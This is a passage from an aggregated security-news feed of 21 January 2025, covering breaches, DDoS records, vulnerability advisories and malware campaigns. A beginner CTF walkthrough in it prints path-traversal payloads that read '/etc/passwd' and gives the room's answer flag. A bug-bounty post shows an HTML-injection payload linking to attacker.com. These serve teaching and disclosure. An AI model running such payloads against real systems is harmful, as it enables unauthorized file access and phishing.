Ex-CIA Analyst Pleads Guilty to Sharing Top-Secret Data with Unauthorized PartiesA former analyst working for the U.S. Central Intelligence Agency (CIA) pleaded guilty to transmitting top secret National Defense Information (NDI) to individuals who did not have the necessary authorization to receive it and attempted to cover up the activity. Asif William Rahman, 34, of Vienna, was an employee of the CIA since 2016 and had a Top Secret security clearance with access to
by The Hacker News
2025-01-21 16:07:51
New Mirai Variant Murdoc_Botnet Launches DDoS Attacks via IoT ExploitsThis article explores the recent campaign of Murdoc_Botnet, a malware variant of Mirai targeting vulnerable AVTECH and Huawei…
by Hackread
2025-01-21 16:04:09
Cloudflare mitigated a record-breaking 5.6 Tbps DDoS attackThe largest distributed denial-of-service (DDoS) attack to date peaked at 5.6 terabits per second and came from a Mirai-based botnet with 13,000 compromised devices. [...]
by BleepingComputer
2025-01-21 16:00:00
HackGATE: Setting New Standards for Visibility and Control in Penetration Testing ProjectsImagine receiving a penetration test report that leaves you with more questions than answers. Questions like, ""Were all functionalities of the web app tested?"" or "" Were there any security issues that could have been identified during testing?"" often go unresolved, raising concerns about the thoroughness of the security testing. This frustration is common among many security teams. Pentest
by The Hacker News
2025-01-21 15:47:05
SandboxAQ Partners with Google Cloud to Advance Quantitative AI in Enterprise ApplicationsSandboxAQ is teaming up with Google Cloud to revolutionise how Large Quantitative Models (LQMs) are developed, integrated, and deployed in enterprise environments. The partnership will see SandboxAQ utilize Google Cloud’s advanced infrastructure as its preferred cloud platform and leverage the Google Cloud Marketplace to streamline access to its cutting-edge solutions. SandboxAQ’s LQMs are at the […] The post SandboxAQ Partners with Google Cloud to Advance Quantitative AI in Enterprise Applications appeared first on IT Security Guru.
by IT Security Guru
2025-01-21 15:07:41
Cisco Previews AI Defenses to Cloud Security PlatformSet for release in March, Cisco AI Defense will provide algorithmic red teaming of large language models with technology that came over as part of the Robust Intelligence acquisition last year.
by Dark Reading
2025-01-21 15:00:00
Why CISOs Must Think Clearly Amid Regulatory ChaosEven as the rule book changes, the profession of the CISO remains unchanged: protecting the organization in a world of constant, continually evolving threats.
by Dark Reading
2025-01-21 14:58:20
Fake Homebrew Google ads target Mac users with malwareHackers are once again abusing Google ads to spread malware, using a fake Homebrew website to infect Macs and Linux devices with an infostealer that steals credentials, browser data, and cryptocurrency wallets. [...]
by BleepingComputer
2025-01-21 14:50:38
The Complete Guide to NTFS vs Share PermissionsThis post first appeared on blog.netwrix.com and was written by Dirk Schrader.The foundation of Windows security is simple — if you want access to a network resource such as a file or folder, you need the appropriate permissions. But implementation is more complex because the Windows operating system has two types of permissions: NTFS permissions, which operate at the file system level, and share permissions, which … Continued
by Netwrix
2025-01-21 14:33:39
Toronto school district says 40 years of student data stolen in PowerSchool breachCanada’s largest school board says hackers may have accessed some 40 years’ worth of student data during the recent PowerSchool breach.  In a letter sent to parents this week, the Toronto District School Board (TDSB) said that the data breach affected all students enrolled in the district between September 1985 and December 2024. The school […] © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-21 14:10:04
AI tool GeoSpy analyzes images and identifies locations in secondsForget OSINT, AI-supported tool GeoSpy can determine a person''s location based on their surroundings in a picture.
by Malwarebytes Labs
2025-01-21 14:00:00
Record-breaking 5.6 Tbps DDoS attack and global DDoS trends for 2024 Q42024 ended with a bang. Cloudflare mitigated another record-breaking DDoS attack peaking at 5.6 Tbps.
by Cloudflare
2025-01-21 14:00:00
CyberheistNews Vol 15 #03 Waging War on Explicit Deepfakes. The Real Problem Behind the UK Crackdown.
by KnowBe4
2025-01-21 14:00:00
Are attackers already embedded in U.S. critical infrastructure networks?The threat of cyberattacks against critical infrastructure in the United States has evolved beyond data theft and espionage. Intruders are already entrenched in the nation’s most vital systems, waiting to unleash attacks. For instance, CISA has raised alarms about Volt Typhoon, a state-sponsored hacking group that has infiltrated critical infrastructure networks. Their goal? To establish […] The post Are attackers already embedded in U.S. critical infrastructure networks? appeared first on Security Intelligence.
by Security Intelligence
2025-01-21 14:00:00
The New Face of Ransomware: Key Players and Emerging Tactics of 2024As we step into 2025, the high-impact, financially motivated ransomware landscape continues to evolve, shaped by a combination of law enforcement actions, shifting affiliate dynamics, advancements in defensive approaches, and broader economic and geopolitical influences.
by SpiderLabs Blog
2025-01-21 13:50:00
The fall and rise of TikTok (traffic)On January 19, 2025, ByteDance suspended TikTok and related apps for US users. We examine the 14-hour traffic plunge, recovery near Donald Trump’s inauguration.
by Cloudflare
2025-01-21 13:34:37
Infrastructure Defense: Communications systemsThe Communications Sector is a key enabler of all other infrastructure sectors in the United States, and it''s under continuous attack by foreign threat actors.
by Barracuda
2025-01-21 13:22:35
Tunneling Flaws Put VPNs, CDNs and Routers at Risk GloballyMillions of devices, including home routers, VPN servers, and CDNs are vulnerable to exploitation due to critical flaws…
by Hackread
2025-01-21 13:11:41
Critical Mozilla Vulnerabilities Prompt Urgent Updates for Firefox and Thunderbird UsersMozilla Firefox and Thunderbird users are facing a series of high-severity vulnerabilities that could leave systems open to exploitation. The Indian Computer Emergency Response Team (CERT-In) issued an advisory on January 20, 2025, highlighting multiple security flaws in Mozilla’s popular browser and email client. These Mozilla vulnerabilities, which affect both desktop and mobile versions, could lead to arbitrary code execution, system instability, and privilege escalation. Mozilla has already released patches to address these issues, and users are urged to update their software immediately. Mozilla Vulnerabilities Target Unsuspecting Victims The vulnerabilities in Mozilla products affect various versions of Firefox and Thunderbird, including both standard and Extended Support Release (ESR) versions. Specifically, the flaws impact the following: Mozilla Firefox versions prior to 134 Mozilla Firefox ESR versions prior to 128.6 and 115.19 Mozilla Thunderbird versions prior to 134 Mozilla Thunderbird ESR versions prior to 128.6 and 115.19 These vulnerabilities are critical, as they present a serious risk to both individual users and enterprises that rely on Mozilla’s software for everyday browsing and communication. Without patching, attackers could exploit these vulnerabilities to gain unauthorized access, execute arbitrary code, or cause significant system disruptions. Overview of Mozilla Vulnerabilities A range of vulnerabilities has been identified across Mozilla Firefox and Thunderbird, potentially allowing remote attackers to perform malicious actions such as code execution, denial of service (DoS) attacks, or bypass security restrictions. These vulnerabilities stem from weaknesses in core components of the software, including the WebChannel API and memory safety protocols. The issues identified are significant because they can be exploited without direct interaction from the attacker, making them even more dangerous. Key Vulnerabilities and Their Impact Some of the most critical vulnerabilities found in Mozilla Firefox and Thunderbird include the following: CVE-2025-0244: CVE-2025-0244 is a high-impact vulnerability in Firefox for Android that allows attackers to spoof the address bar, misleading users into believing they were visiting a legitimate website. This flaw significantly increased the risk of phishing attacks and other malicious activities, potentially compromising user security. CVE-2025-0245: CVE-2025-0245 is a moderate-impact vulnerability in Firefox Focus for Android. This flaw allows attackers to bypass the lock screen settings, which are meant to secure the app. As a result, unauthorized individuals could gain access to the application, potentially compromising user privacy and security. CVE-2025-0237: CVE-2025-0237 is a moderate-impact vulnerability in the WebChannel API, which is used for inter-process communication in both Firefox and Thunderbird. The issue arises because the WebChannel API failed to properly validate the sender''s principle, enabling attackers to escalate their privileges and gain unauthorized access to the affected system. CVE-2025-0239: CVE-2025-0239 is a moderate-impact vulnerability caused by a flaw in the handling of JavaScript text segmentation. This issue could lead to memory corruption, potentially resulting in system crashes or allowing remote code execution, thereby compromising the security of the affected system. CVE-2025-0242: CVE-2025-0242 highlights several memory safety bugs found in both Firefox and Thunderbird, which pose a high security risk. If exploited, these vulnerabilities could enable remote attackers to execute arbitrary code, potentially compromising the affected system’s security and integrity. Mozilla’s Response and Patches In response to these vulnerabilities, Mozilla has issued security patches for the following versions: Mozilla Firefox 134 Mozilla Thunderbird 134 Firefox ESR 115.19 and 128.6 Thunderbird ESR 115.19 and 128.6 Users are strongly encouraged to update to these versions as soon as possible. These patches address the critical issues and provide improved system stability. Conclusion The vulnerabilities in Mozilla Firefox and Thunderbird highlight the need for quick action to protect systems. Users should update to the latest versions, monitor for suspicious activity, and enable security features like multifactor authentication. Applying patches and following best practices can reduce exposure to these risks. For businesses, advanced threat detection tools like Cyble’s can further enhance security.
by The Cyber Express
2025-01-21 12:50:47
JoCERT Issues Warning on Exploitable Command Injection Flaws in HPE Aruba ProductsOverview JoCERT has issued an alert regarding critical command injection vulnerabilities discovered in HPE Aruba’s 501 Wireless Client Bridge. The vulnerabilities, tracked as CVE-2024-54006 and CVE-2024-54007, allow authenticated attackers with administrative privileges to execute arbitrary commands on the device''s underlying operating system. These flaws have been rated as high severity (CVSS score: 7.2) and pose a significant risk if left unaddressed. A publicly released proof-of-concept (PoC) exploit further amplifies the urgency for organizations using affected devices to take immediate action. Vulnerabilities Overview HPE Aruba Networking has confirmed the existence of multiple command injection vulnerabilities in the web interface of the 501 Wireless Client Bridge. Below is a detailed breakdown of these vulnerabilities: CVE-2024-54006: Exploitation enables attackers to execute arbitrary commands as privileged users. CVE-2024-54007: Similarly, this flaw allows attackers to run commands remotely with administrative credentials. Both vulnerabilities: Require administrative authentication credentials to exploit. Allow attackers to gain full control over the device upon successful exploitation. Impact the confidentiality, integrity, and availability of the device. Affected Software Versions The vulnerabilities affect the following software versions: HPE Aruba 501 Wireless Client Bridge: Versions V2.1.1.0-B0030 and below. Devices running software versions higher than V2.1.2.0-B0033 are not impacted. Any other HPE Aruba Networking products not explicitly mentioned remain unaffected. Severity and Exploitability Severity: High (CVSS score: 7.2) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Exploitability: Exploitation requires authenticated administrative credentials. However, once exploited, attackers gain full control of the device, potentially enabling malicious activities such as data exfiltration, lateral movement, and network disruption. Public Discussion: A proof-of-concept exploit script has been released publicly, making these vulnerabilities more accessible to attackers. Mitigation and Recommendations To safeguard against these vulnerabilities, organizations should follow these steps: Upgrade to a Fixed Version: Update affected devices to software version V2.1.2.0-B0033 or later. The fixed software can be downloaded from the HPE Networking Support Portal. Restrict Management Interfaces: Limit access to the Command Line Interface (CLI) and web-based management interfaces to a dedicated Layer 2 VLAN or secure them with Layer 3 firewall policies. Audit Network Devices: Conduct a thorough security audit of all Aruba devices within your network to identify any unauthorized access or misconfigurations. Strengthen Authentication Mechanisms: Enforce strong administrative passwords. Regularly rotate administrative credentials to minimize the risk of unauthorized access. Monitor for Suspicious Activity: Implement robust monitoring to detect any unusual or unauthorized access attempts to the 501 Wireless Client Bridge. Stay Informed: Subscribe to HPE’s Security Bulletin alerts to receive updates about future vulnerabilities and patches. Technical Details of the Vulnerabilities CVE-2024-54006 Description: Multiple command injection vulnerabilities exist in the web interface of the 501 Wireless Client Bridge, allowing attackers to execute arbitrary commands as a privileged user. Exploitation requires administrative authentication credentials. CVSS Base Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H CVE-2024-54007 Description: Similar to CVE-2024-54006, this vulnerability allows authenticated attackers to execute commands on the device''s underlying operating system via the web interface. CVSS Base Score: 7.2 CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Both vulnerabilities were discovered and reported by Nicholas Starke of HPE Aruba Networking SIRT and Hosein Vita. Workarounds For organizations unable to immediately update to the fixed version, the following workarounds are recommended: Restrict Network Access: Isolate the device management interfaces to a secure VLAN or subnet. Firewall Rules: Configure Layer 3 and above firewall policies to limit access to the management interfaces. Monitoring and Logging: Enable detailed logging to monitor for unusual administrative activities. These workarounds are temporary and should not replace patching, which is the most effective mitigation strategy. Final Notes These command injection vulnerabilities in HPE Aruba’s 501 Wireless Client Bridge underline the importance of proactive cybersecurity practices. With the rise of publicly disclosed exploits, organizations must act quickly to mitigate risks by updating vulnerable devices, monitoring for threats, and enforcing strict access controls. Failure to address these vulnerabilities could result in compromised devices, data breaches, and disrupted operations. Take immediate action to protect your network and maintain the integrity of your systems. Source: https://jocert.ncsc.jo/EN/ListDetails/Security_Alerts__Advisorites/1203/87 https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04763en_us&docLocale The post JoCERT Issues Warning on Exploitable Command Injection Flaws in HPE Aruba Products appeared first on Cyble.
by CYBLE
2025-01-21 12:34:59
CERT-UA warned of scammers impersonating the agency using fake AnyDesk requestsCERT-UA warned of scammers impersonating the agency, using fake AnyDesk requests to conduct fraudulent security audits. The Computer Emergency Response Team of Ukraine (CERT-UA) warned of cyber scams involving threat actors impersonating the agency by sending fraudulent AnyDesk connection requests under the guise of security audits. CERT-UA pointed out that it uses the software AnyDesk […]
by Security Affairs
2025-01-21 11:40:43
Lo-Fi — TryHackMe CTF Walkthrough For Beginners | By Pranav S V | Jan, 25Lo-Fi — TryHackMe CTF Walkthrough For Beginners | By Pranav S V | Jan, 25IntroductionHello, hackers! Today, we will solve the TryHackMe CTF called "Lo-Fi." As we progress, we will explain the topics and techniques used in the CTF. Let’s get started!________________________________Local File Inclusion and File Path TraversalBefore starting the CTF, you need to understand the topic of Local File Inclusion (LFI). So, what exactly is Local File Path Traversal?Let me first explain Local File Inclusion. It is a process in which we exploit the ability to include local server files and execute them on the server. This allows us to access system files we are normally restricted from accessing.Eg: index.php?page=/etc/passwd or index.php?page=../../config.phpPath Traversal, on the other hand, is an exploit that allows us to manipulate the file path mentioned in the URL to gain unauthorized access to restricted areas.Eg: ../../etc/passwdTask 1:Want to hear some lo-fi beats, to relax or study to? We''ve got you covered!Access this challenge by deploying both the vulnerable machine by pressing the green "Start Machine" button located within this task, and the TryHackMe AttackBox by pressing the "Start AttackBox" button located at the top-right of the page.Navigate to the following URL using the AttackBox: http://MACHINE_IP and find the flag in the root of the filesystem.Check out similar content on TryHackMe:LFI Path TraversalFile InclusionNote: The web page does load some elements from external sources. However, they do not interfere with the completion of the room.Answer the questions below:1. Climb the filesystem to find the flag!flag{e4478e0eab69bd642b8238765dcb7d18}ExplanationThis link http://10.10.118.152 which redirected me to this page:On the site, there are some options, and when I explored them, I ended up here:The interesting part here is the URL, which has a file inclusion vulnerability that we can exploit to traverse across the files in the system. To confirm if it works, we can start by checking the contents of the /etc/passwd file."You can use this payload to check it :../../../../etc/passwdYes, it’s working, so now we can traverse and find the flag content. After crafting some payloads, I found the correct one.It is:../../../../flag.txtSo, that’s all.Feel free to follow me for more content, and join our discord community for cybersecurity enthusiasts: https://discord.gg/bqVMEFUuHMLo-Fi — TryHackMe CTF Walkthrough For Beginners | By Pranav S V | Jan, 25 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2025-01-21 11:40:16
Hacking EscapeTwo on HackTheBox: A Step-by-Step OSCP JourneyMore active directory fun…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-21 11:34:55
WIFI Hacking , user and password hacking [How hackers get Password of any wifi network]Hi Horbio this side , I hope you are doing well. I know you want to get password their neighbour’s wifi that’s why you are here. Don’t…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-21 11:34:25
Found HTML Injection in Emails! Earned HOFHello Hackers, In the quick writeup I am going to disclose my recent finding of HTMLI in email in Quickreel through comolho bug bounty platform.So, During testing the signup feature I found that full name field was vulnerable to HTML injection vulnerability so below are the steps how I perform the attack.Steps to Reproducevisit: https://app.quickreel.io/loginNow click on Register button.Now in name field add following payloadPayload:<a href="https://attacker.com"> <img src="https://shorturl.at/CsAH1" width="200"> </a> <!--4. Now enter email in which you want to execute the payload and then after entering password click on submit.And the victim got this in their email:Mitigations for HTMLI:Sanitize User Input: Ensure all user inputs are stripped of HTML or JavaScript before rendering in email templates. Libraries like DOMPurify can help sanitize input effectively.Encode Output: Encode special characters in emails to prevent browser rendering.Restrict Input Fields: Enforce character length limits and only allow plain text where HTML is unnecessary.Validate Content: Conduct regular audits of email templates to ensure no unsafe content injection occurs.Use Security Headers: Implement Content Security Policy (CSP) to block rendering of malicious scripts in emails.And as expected again this report was also closed as Duplicate 😥 but they still awarded me HOF for securing them and list my name into their bug bounty hof section 🥳.Rewarded HOF in Quickreel bug bounty programI don’t know but till now none of my report was triaged! 2 are closed as Duplicates and 1 was closed as NA and 3 are still in pending from 16th Dec. I don’t know why this is happening 😕 in this platform.Timeline:16–12–2024: Reported06–01–2025: Closed as Duplicate06–01–2025: Awarded HOFThank you for reading. I will see you in next amazing one. Bye 👋🚨 Found HTML Injection in Emails! Earned HOF 🏆 was originally published in InfoSec Write-ups on Medium, where people are continuing the conversation by highlighting and responding to this story.
by InfoSec Write-ups
2025-01-21 11:32:26
Splunk Series: Forwarding Logs Using Universal Forwarder (Part 2)Hello, my digital adventurers. This is the 2nd part of my Splunk series. In this blog, I will show you how to send logs to the Splunk…Continue reading on InfoSec Write-ups »
by InfoSec Write-ups
2025-01-21 11:30:14
Sophos MDR tracks two ransomware campaigns using “email bombing,” Microsoft Teams “vishing”Sophos MDR identifies a new threat cluster riffing on the playbook of Storm-1811, and amped-up activity from the original connected to Black Basta ransomware.
by Sophos News
2025-01-21 11:21:22
HPE investigating security breach after hacker claims theft of sensitive dataA well-known hacker claims to have stolen source code and user data from the enterprise IT giant © 2024 TechCrunch. All rights reserved. For personal use only.
by TechCrunch
2025-01-21 11:15:00
PNGPlug Loader Delivers ValleyRAT Malware Through Fake Software InstallersCybersecurity researchers are calling attention to a series of cyber attacks that have targeted Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China with a known malware called ValleyRAT. The attacks leverage a multi-stage loader dubbed PNGPlug to deliver the ValleyRAT payload, Intezer said in a technical report published last week. The infection chain commences with a phishing
by The Hacker News
2025-01-21 11:12:45
How to download, install, and update Kaspersky apps for Android | Kaspersky official blogHow to download, install, and update Kaspersky apps for Android from alternative stores.
by Kaspersky
2025-01-21 11:00:00
7 Common Pitfalls in Data Science Projects — and How to Avoid ThemFrom low-quality data to unclear goals and poor collaboration, learn how to sidestep the key challenges that can derail your data science initiatives.
by ITPro Today
2025-01-21 11:00:00
Data Storage and Analytics Trends and Predictions 2025 From Industry InsidersIT leaders and industry insiders share their data storage, management, and analytics trends and predictions for 2025.
by ITPro Today
2025-01-21 10:57:00
CERT-UA Warns of Cyber Scams Using Fake AnyDesk Requests for Fraudulent Security AuditsThe Computer Emergency Response Team of Ukraine (CERT-UA) is warning of ongoing attempts by unknown threat actors to impersonate the cybersecurity agency by sending AnyDesk connection requests. The AnyDesk requests claim to be for conducting an audit to assess the ""level of security,"" CERT-UA added, cautioning organizations to be on the lookout for such social engineering attempts that seek to
by The Hacker News
2025-01-21 10:25:18
High Severity Vulnerability Discovered in CP Plus Router: Immediate Attention NeededA security vulnerability has been identified in the CP Plus CP-XR-DE21-S Router, which could potentially expose sensitive user information and compromise system integrity. This CP Plus Router vulnerability, categorized under the CERT-In Vulnerability Note CIVN-2025-0005, was disclosed on January 20, 2025. Its severity rating is classified as ""HIGH,"" indicating the critical nature of the threat. The vulnerability, which affects the router''s firmware version DE21_S_india_hx806_1.057.043_0023, poses a risk to both home users and small-office administrators relying on CP Plus for their 4G LTE connectivity. The CP Plus Router Vulnerability The CP Plus router vulnerability stems from a security misconfiguration in its web interface. Specifically, it involves insecure handling of cookie flags, which could allow an attacker to hijack an HTTP session. This flaw could be exploited by a remote attacker who intercepts data transmissions during an HTTP session. The attacker could then potentially access sensitive information, compromise the targeted device, and escalate the attack to manipulate the router’s settings or steal confidential data. The issue is linked to a sensitive cookie in an HTTPS session that lacks the ""Secure"" attribute, a problem that falls under the Common Weakness Enumeration (CWE-614). This misconfiguration exposes the router to risks like Session Hijacking or Man-in-the-Middle (MITM) attacks, where attackers intercept and alter communications between the user and the system. Impact and Risk Assessment The vulnerability in CP Plus Router has the potential to severely impact the confidentiality, integrity, and availability of the targeted device. Should an attacker successfully exploit the vulnerability, they could gain unauthorized access to critical data stored within the router, such as user credentials, network configurations, and other sensitive network-related information. Furthermore, an attacker could alter these settings to disrupt the router’s operations or even gain control over connected devices. Since the CP Plus CP-XR-DE21-S Router is commonly used in both home and small-office environments, the implications of this vulnerability are far-reaching. Unauthorized access could lead to the theft of personal or corporate data, loss of service, and extensive damage to the security of the network. Discovery and Acknowledgment This critical vulnerability was reported by security researchers Shravan Singh and Karan Patel. Their research revealed the insecure handling of cookie flags, which ultimately exposed the router to the described security risks. The vulnerability has been assigned the identifier CVE-2025-0479 in the Common Vulnerabilities and Exposures (CVE) system. Despite the discovery, there is currently no public proof-of-concept (PoC) available, nor is there evidence of the vulnerability being actively exploited in the wild. However, this should not diminish the severity of the threat, and users of CP Plus Routers should take immediate steps to mitigate any potential risks until a patch is released. Mitigation and Recommendations As of the disclosure date, no official patch has been released to address the CP Plus Router vulnerability. Users and administrators of affected routers are advised to follow several key security practices to mitigate the risks associated with this vulnerability. Restrict access to the router’s web interface to trusted networks only. This will reduce the chances of an external attacker exploiting the vulnerability. Employ a VPN or another secure method to connect remotely to the router’s web interface, ensuring that the data transmission remains encrypted. Regularly check the router''s logs for unusual activities or signs of exploitation. If the router’s web interface is not essential for daily operations, consider disabling it altogether to eliminate one attack vector. Implement network segmentation to isolate the CP Plus Router from more critical systems within the network, limiting the potential damage in case of an exploit. Educate users about the risks of accessing the router''s interface from untrusted networks, such as public Wi-Fi. Conclusion The CP Plus Router vulnerability highlights the critical need for proper security configurations, especially when handling sensitive data within network devices. Until a formal patch is made available, users must remain proactive in securing their devices, while the security community continues to monitor the situation closely. Any updates or patches from CP Plus will be essential in addressing this high-severity risk. As connected devices become increasingly integral to daily life, it is crucial for users of the CP Plus CP-XR-DE21-S Router to prioritize addressing this vulnerability and implementing appropriate mitigation measures to protect their systems.
by The Cyber Express
2025-01-21 09:26:38
Critical Mozilla Vulnerabilities Prompt Urgent Updates for Firefox and Thunderbird UsersOverview Mozilla products, including the popular Mozilla Firefox and Thunderbird, have been found to contain multiple vulnerabilities that could allow attackers to execute arbitrary code, cause system instability, and even gain escalated privileges. The severity of these issues is high, and they affect both desktop and mobile versions of Mozilla''s browser and email client. The Indian Computer Emergency Response Team (CERT-In) reported these Mozilla vulnerabilities in an advisory published on January 20, 2025, with patches already available in recent updates. Users and organizations relying on Mozilla Firefox, Mozilla Thunderbird, and their extended support release (ESR) versions are advised to take immediate action to mitigate risks. The Mozilla vulnerabilities are present in several versions of Mozilla Firefox and Thunderbird, specifically: Mozilla Firefox versions prior to 134 Mozilla Firefox ESR versions prior to 128.6 Mozilla Firefox ESR versions prior to 115.19 Mozilla Thunderbird versions prior to 134 Mozilla Thunderbird ESR versions prior to 128.6 Mozilla Thunderbird ESR versions prior to 115.19 The issues are critical for both individual users and enterprises using these open-source applications for browsing and communication. Users should ensure they have the latest updates installed to avoid potential exploits. Overview of the Mozilla Vulnerabilities A range of vulnerabilities has been identified in Mozilla Firefox and Thunderbird, with the potential to allow attackers to perform actions such as remote code execution (RCE), denial of service (DoS) attacks, bypass security restrictions, or even spoof system elements. Mozilla has provided security patches in versions 134 for Firefox and Thunderbird, as well as in the ESR releases 128.6 and 115.19. These issues are significant because they provide opportunities for remote attackers to exploit weaknesses in the software without needing to interact directly with the targeted system. Vulnerabilities in Mozilla Firefox and Thunderbird have been classified with high and moderate severity levels, as attackers could gain unauthorized access to sensitive information, execute arbitrary code, or disrupt normal system operations. The full exploitation of these vulnerabilities may result in system instability or a complete compromise of the affected device. Key Vulnerabilities Several vulnerabilities have been identified and addressed across Mozilla Firefox and Thunderbird. Below are some of the notable issues that have been fixed in the latest updates: CVE-2025-0244: Address Bar Spoofing in Firefox for Android Impact: High Description: This vulnerability allowed an attacker to spoof the address bar in Firefox for Android when redirecting to an invalid protocol scheme. This could mislead users into believing they were on a legitimate site, facilitating phishing and other malicious activities. Note: This issue only affected Android operating systems. CVE-2025-0245: Lock Screen Setting Bypass in Firefox Focus for Android Impact: Moderate Description: A flaw in Firefox Focus allowed attackers to bypass user authentication settings for the lock screen, potentially giving unauthorized individuals access to the application. CVE-2025-0237: WebChannel API Vulnerability Impact: Moderate Description: The WebChannel API, used for communication across processes in Firefox and Thunderbird, did not properly validate the sender''s principal. This could lead to privilege escalation attacks, allowing attackers to perform actions with higher privileges than intended. CVE-2025-0239: Memory Corruption via JavaScript Text Segmentation Impact: Moderate Description: A flaw in how Firefox and Thunderbird handled JavaScript text segmentation could cause memory corruption, which might lead to crashes or, in some cases, the execution of arbitrary code. CVE-2025-0242: Memory Safety Bugs Impact: High Description: Several memory safety bugs were discovered in both Firefox and Thunderbird that showed signs of memory corruption. If exploited, these bugs could allow remote attackers to execute arbitrary code, compromising system security. Fixed in: Firefox 134, Thunderbird 134, Firefox ESR 115.19, Firefox ESR 128.6, Thunderbird 115.19, Thunderbird 128.6 These vulnerabilities in Mozilla products are part of a broader set of security flaws that the Mozilla team has identified and addressed. The vulnerabilities affect multiple platforms, including desktop and mobile versions, and may result in severe security breaches if not patched. Recommendations for Users Given the potential impact of these Mozilla vulnerabilities, it is crucial for all users to update their systems to the latest versions of Mozilla Firefox or Thunderbird. The updates, which are available for both standard and ESR releases, fix critical security flaws and improve overall system stability. Additionally, users are advised to consider the following precautions: Ensure that Mozilla Firefox and Thunderbird are updated to versions 134 or higher, or to the appropriate ESR releases (128.6 or 115.19). Keep an eye on system behavior for signs of malicious exploitation, such as unexpected crashes or unauthorized access. For those using Mozilla Firefox or Thunderbird in a business environment, enable multifactor authentication and other security features to limit exposure to attacks. Without the proper patches, attackers can exploit Mozilla Firefox vulnerabilities to gain access to sensitive data, compromise user systems, and cause severe disruptions. Memory corruption issues, such as those reported in CVE-2025-0242, could lead to remote code execution, allowing attackers to hijack user systems or deploy malware. Furthermore, flaws like CVE-2025-0244 could facilitate phishing campaigns by spoofing URLs in the address bar, tricking users into visiting malicious websites. Conclusion Mozilla has released important security fixes for vulnerabilities in Mozilla Firefox and Mozilla Thunderbird that affect a wide range of users. These vulnerabilities, which could lead to arbitrary code execution, denial of service, or privilege escalation, are present in older versions of the software. Users are strongly advised to upgrade to the latest versions to protect against potential exploitation. Additionally, by applying recommended mitigations and staying informed about the latest security updates, users can better protect their systems from cyber threats. To protect online systems against these vulnerabilities, Cyble, an award-winning cybersecurity firm, offers advanced, AI-powered cybersecurity solutions. With platforms like Cyble Vision, businesses can leverage real-time threat detection and actionable insights to mitigate risks from these vulnerabilities, including Mozilla vulnerabilities. Cyble’s comprehensive suite of tools, including vulnerability management, dark web monitoring, and brand intelligence, helps organizations proactively address security gaps. By integrating Cyble’s threat intelligence, companies can enhance their defenses and better protect against cyberattacks. For more information on how Cyble can help protect your systems, schedule a personalized demo and see how AI-driven solutions can strengthen your cybersecurity strategy. References https://www.cert-in.org.in/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-03/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-02/ https://www.mozilla.org/en-US/security/advisories/mfsa2025-01/ The post Critical Mozilla Vulnerabilities Prompt Urgent Updates for Firefox and Thunderbird Users appeared first on Cyble.
by CYBLE
2025-01-21 09:19:00
HPE probes hacker claim involving trove of sensitive company dataThe vendor said it has no immediate evidence of operational impacts or compromised customer data.
by Cybersecurity Dive
2025-01-21 08:58:30
Finding and Exploiting XSS in Web Applications (Step-by-Step)Awesome blog! Thanks for sharing this valuable information
by HACKLIDO
2025-01-21 08:57:58
Experts found multiple flaws in Mercedes-Benz infotainment systemKaspersky researchers shared details about multiple vulnerabilities impacting the Mercedes-Benz MBUX infotainment system. Kaspersky published research findings on the first-generation Mercedes-Benz User Experience (MBUX) infotainment system, specifically focusing on the Mercedes-Benz Head Unit. The researchers started from the results of another study conducted by KeenLab on the MBUX internals. The experts used a diagnostic software […]
by Security Affairs
2025-01-21 08:43:00
Treasury Department issues sanctions linked to cyber intrusions, telecom attacksThe Office of Foreign Assets Control took measures against a state-linked hacker and a Shanghai-based cybersecurity firm in response to the recent attacks against critical infrastructure in the U.S.
by Cybersecurity Dive
2025-01-21 08:26:40
New Cyber Threat Exposed: Advanced Techniques Used to Target German SystemsA new cyberattack targeting German entities has recently been uncovered by Cyble Research and Intelligence Labs (CRIL). This attack leverages sophisticated techniques such as DLL Sideloading, DLL Proxying, and the Sliver implant to compromise systems. The attack uses these advanced methods to evade detection and establish a persistent foothold within the victim''s network. The ongoing campaign, first detected by CRIL, employs a highly deceptive approach to infiltrate systems. It starts with a phishing email that contains an archive file. When opened, the archive, which appears to be harmless, contains several components designed to exploit the victim''s system. One of the most notable files is a shortcut (.LNK) file, which, when executed, opens a seemingly innocuous document titled ""Homeoffice-Vereinbarung-2025.pdf"" — a decoy remote work agreement. However, real damage occurs in the background. Upon execution of the LNK file, the system runs a legitimate executable, wksprt.exe, which resides in the C:WindowsSystem32 directory. This executable performs DLL Sideloading, a technique that loads a malicious DLL file — IPHLPAPI.dll — into the system. Interestingly, this malicious DLL is designed to mimic a legitimate system file, increasing its chances of bypassing security measures. The malicious DLL uses DLL Proxying to intercept function calls made by the executable and forward them to another legitimate DLL. This proxying technique allows the malicious DLL to remain undetected while executing harmful shellcode in the background. The shellcode, once executed, decrypts and runs the final payload: a Sliver implant, a popular open-source framework used for command-and-control operations in adversary emulation and Red Team exercises. DLL Sideloading and DLL Proxying: The Infection Process [caption id=""attachment_100350"" align=""alignnone"" width=""588""] Infection Chain (Source: Cyble)[/caption] The attack starts when the victim extracts the archive file, which contains several files with names such as IPHLPAPI.dll, ccache.dat, and Homeoffice-Vereinbarung-2025.pdf.lnk. The files appear harmless at first glance, with the PDF document serving as the primary lure. However, once the LNK file is executed, it triggers a sequence of commands that copy wksprt.exe and other malicious files into specific system directories, including the hidden InteI folder under the %localappdata% path. To ensure persistence, the wksprt.lnk shortcut is placed in the system’s Startup folder, making sure that the malware executes automatically when the system reboots. During this process, the malicious DLL file uses DLL Proxying to load another legitimate DLL, which then assists in reading the encrypted ccache.dat file containing the embedded shellcode. Advanced Evasion Techniques The DLL Sideloading and DLL Proxying techniques used in this attack are crucial for bypassing traditional detection mechanisms. The malicious IPHLPAPI.dll file is designed to look like a standard system file, making it harder for security tools to identify it as malicious. Additionally, by using 